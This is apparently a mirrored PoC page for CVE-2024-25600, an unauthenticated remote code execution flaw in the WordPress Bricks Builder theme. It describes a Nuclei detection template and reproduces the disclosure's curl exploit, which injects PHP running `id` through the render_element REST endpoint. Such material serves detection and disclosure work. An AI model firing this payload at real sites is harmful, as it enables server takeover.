Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-25600 PoC — WordPress Plugin Bricks Builder Theme 安全漏洞

Source
Associated Vulnerability
Title:WordPress Plugin Bricks Builder Theme 安全漏洞 (CVE-2024-25600)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Bricks Builder Theme 1.9.6版本存在安全漏洞,该漏洞源于允许攻击者通过利用随机数泄漏来绕过身份验证来执行任意 PHP 代码。
Description
Nuclei template and information about the POC for CVE-2024-25600
Readme
# CVE-2024-25600_Nuclei-Template
Nuclei template and information about the POC for CVE-2024-25600

## Description 📝

The Bricks theme for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.9.6. This makes it possible for unauthenticated attackers to execute code on the server.
This template 🛠️ is designed to detect the CVE-2024-25600 vulnerability 🕳️ found in the Bricks Builder plugin for WordPress using nuclei. The vulnerability allows for unauthenticated remote code execution on affected websites 💻.

## Proof of Concept (PoC) 📝

The Complete POC (automatic) is avaible at [https://github.com/chocapikk/CVE-2024-25600](https://github.com/chocapikk/CVE-2024-25600).

The base PoC provided by the disclosure is as follows:

```bash
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'
```

Replace `[HOST]` with the target website and `[NONCE]` with the nonce value retrieved from the site.

## Reference 📖

For more information about the CVE-2024-25600 vulnerability, please refer to the detailed disclosure at [Snicco.io](https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6).
File Snapshot

[4.0K] /data/pocs/735170461afc80384da43434b35dc6ba992116e0 ├── [2.0K] CVE-2024-25600_interactsh.yaml ├── [2.0K] CVE-2024-25600.yaml └── [1.5K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.